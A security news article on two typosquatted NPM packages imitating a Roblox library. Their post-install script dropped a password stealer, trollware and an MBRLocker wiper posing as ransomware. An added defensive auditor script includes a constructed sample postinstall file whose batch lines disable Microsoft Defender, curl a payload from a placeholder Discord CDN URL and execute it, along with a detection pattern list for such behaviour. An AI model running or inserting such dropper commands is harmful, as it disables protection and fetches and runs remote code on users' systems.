Malicious NPM packages used to install password stealer and ransomware

Pretend Roblox libraries deliver ransomware and information-stealing trojan

The handful of malicious activities launched on the system when the malicious libraries pretended to be a legitimate Roblox package

Criminals managed to spread malware by publishing two typosquatted libraries to the official NPM registry that mimic a legitimate Roblox package.[1] Unsuspecting users who installed them got a password-stealing trojan and ransomware loaded onto their systems. The two NPM packages were named noblox.js-proxy and noblox.js-proxies. Changing only a letter or two of the name allowed the attackers to pose as the legitimate Roblox API wrapper noblox.js-proxied.[2]

The report[3] describes abuse of the open-source ecosystem to deploy ransomware. The issue was detected quickly, so the typosquats had little impact. However, the threat actors aimed big: since the impersonated component is popular, the incident could have had major consequences had it not been detected in time.

Sonatype researcher Juan Aguirre stated:

They both had minimal impact with Noblox.js-proxy seeing 281 total downloads and Noblox.js-proxies seeing 106 total downloads, but it’s clear what type of scale the threat actors were hoping for going after such a popular component.

Further analysis showed that the malicious NPM packages delivered MBRLocker ransomware impersonating the GoldenEye ransomware.[4] In addition to the cryptovirus, trollware and a password-stealing trojan were dropped. The libraries have been taken down and should no longer be available or dangerous.

A full list of malicious behavior

Analysis of the malicious packages showed that a Batch script was dropped by the post-installation JavaScript file. The script downloads the malware executables from Discord's content delivery network and disables anti-malware engines. Once persistence is achieved this way, the other activities follow:

  • browser credential siphoning[5];
  • execution of the downloaded binaries;
  • ransomware drop;
  • trollware installation;
  • password-stealing trojan deployment.

The malicious files provided by the researchers and their analysis show that several different scripts were launched: one tampers with Microsoft Defender; a stealer collects data from browsers, such as history, cookies and saved passwords, and attempts to record video by triggering the built-in web camera; and trollware that changes the current user name to UR NEXT is executed. This piece plays videos, alters passwords and attempts to lock the victim out of their system.
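The install-time hook is the part of this attack a defender can check for before anything runs. The following is an added example, not code from the article or from Sonatype's report: it audits a package's package.json for lifecycle hooks (preinstall/install/postinstall/prepare), scans the hook command and any package file it runs for the behaviours described above (batch script, PowerShell, a downloader, a Discord CDN URL, Defender tampering), and flags a package name that sits within a couple of edits of a package you actually meant to install. The sample package.json, the postinstall file and the `KNOWN_PACKAGES` allow-list are constructed for illustration and are assumptions, not data from the registry or from the malicious packages.

```javascript
// Added example (not from the article or from Sonatype's report): audit an npm
// package for install-time lifecycle hooks and for a name that looks like a
// typosquat of a known package. The package.json, script file and the list of
// "known" package names below are constructed for illustration (assumptions),
// not data taken from the npm registry or from the malicious packages.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Things a JavaScript library's install hook has no business doing.
const SUSPICIOUS = [
  { id: 'batch-or-cmd', re: /\.bat\b|\bcmd(\.exe)?\s+\/c/i },
  { id: 'powershell', re: /\b(powershell|pwsh)\b/i },
  { id: 'downloader', re: /\b(curl|wget|certutil|Invoke-WebRequest)\b/i },
  { id: 'discord-cdn', re: /cdn\.discordapp\.com/i },
  { id: 'defender-tamper', re: /Set-MpPreference|Add-MpPreference|DisableRealtimeMonitoring/i },
];

// Assumed allow-list of the packages you actually intend to depend on.
const KNOWN_PACKAGES = ['noblox.js', 'noblox.js-proxied'];

// Levenshtein distance: number of single-character edits between two names.
function editDistance(a, b) {
  const dp = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) dp[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      dp[i][j] = Math.min(dp[i - 1][j] + 1, dp[i][j - 1] + 1, dp[i - 1][j - 1] + cost);
    }
  }
  return dp[a.length][b.length];
}

// A name within maxDistance edits of a known package, but not equal to it, is a lookalike.
function typosquatCandidates(name, knownNames, maxDistance = 2) {
  return knownNames
    .filter((k) => k !== name && editDistance(name, k) <= maxDistance)
    .map((k) => ({ lookalikeOf: k, distance: editDistance(name, k) }));
}

// Scan a hook command plus any package file it runs (e.g. "node postinstall.js").
function hookIndicators(command, files) {
  const referenced = Object.keys(files).filter((f) => command.split(/\s+/).includes(f));
  const text = [command, ...referenced.map((f) => files[f])].join('\n');
  return SUSPICIOUS.filter((s) => s.re.test(text)).map((s) => s.id);
}

// Audit a parsed package.json (pkg) together with its files ({ filename: content }).
function auditPackage(pkg, files, knownNames) {
  const scripts = pkg.scripts || {};
  const hooks = LIFECYCLE_HOOKS
    .filter((h) => typeof scripts[h] === 'string')
    .map((h) => ({ hook: h, command: scripts[h], indicators: hookIndicators(scripts[h], files) }));
  const typosquat = typosquatCandidates(pkg.name, knownNames);
  const risky = typosquat.length > 0 || hooks.some((h) => h.indicators.length > 0);
  return { name: pkg.name, hooks, typosquat, risky };
}

// Constructed sample: a package named like one of the typosquats in the article,
// whose postinstall file drops and runs a batch script (placeholder URL, not a real one).
const SAMPLE_PACKAGE = {
  name: 'noblox.js-proxies',
  version: '1.0.0',
  scripts: { postinstall: 'node postinstall.js' },
};
const SAMPLE_FILES = {
  'postinstall.js': [
    "const fs = require('fs');",
    "const { execSync } = require('child_process');",
    "fs.writeFileSync('run.bat',",
    "  'powershell Set-MpPreference -DisableRealtimeMonitoring $true\\r\\n' +",
    "  'curl -o payload.exe https://cdn.discordapp.com/attachments/EXAMPLE/payload.exe\\r\\n' +",
    "  'payload.exe');",
    "execSync('cmd /c run.bat');",
  ].join('\n'),
};

console.log(JSON.stringify(auditPackage(SAMPLE_PACKAGE, SAMPLE_FILES, KNOWN_PACKAGES), null, 2));
```

Run with node; for the constructed sample it reports the postinstall hook with all five indicators and flags the name as one edit away from noblox.js-proxied. Pattern matching like this only catches what it knows about, so the stronger control is to stop lifecycle hooks from running at all: `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) prevents exactly the post-install execution this campaign relied on, at the cost of breaking packages that legitimately compile native code at install time.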

Tunamor.exe loading the MBRLocker on the machine

The ransomware that gets installed is a version of MBRLocker, Monster ransomware.[6] The executable drops the file virus. Once activated it forces a restart, and a fake CHKDSK window appears on the system; this is when the ransomware supposedly encrypts the computer's files.

Once the process is done, the system reboots and a skull and crossbones appears as the lock screen. This is typical Petya/GoldenEye ransomware behavior that this MBRLocker copies. When any key is pressed, a message about hard disk encryption appears on the screen: the ransom note is delivered, and victims are encouraged to visit a Tor site where the further steps, i.e. paying the ransom, are listed.

The criminals claim to offer decryption, but the analysis showed that the provided decryption keys do not work: the computer runs the alleged decryption, but Windows gets scrambled instead during that time. It seems this is not a file-locker but a wiper designed to destroy the system once payment is transferred, without providing any opportunity to recover files.

The ransomware is not widespread and was distributed only through these NPM packages. That is fortunate as far as this ransomware goes, but malicious NPM packages like these may be used in other supply-chain attacks and become both more common and more dangerous.

About the author
Ugnius Kiguolis

Ugnius Kiguolis is a professional malware analyst, founder and owner of 2-Spyware, and currently serves as its Editor-in-chief.
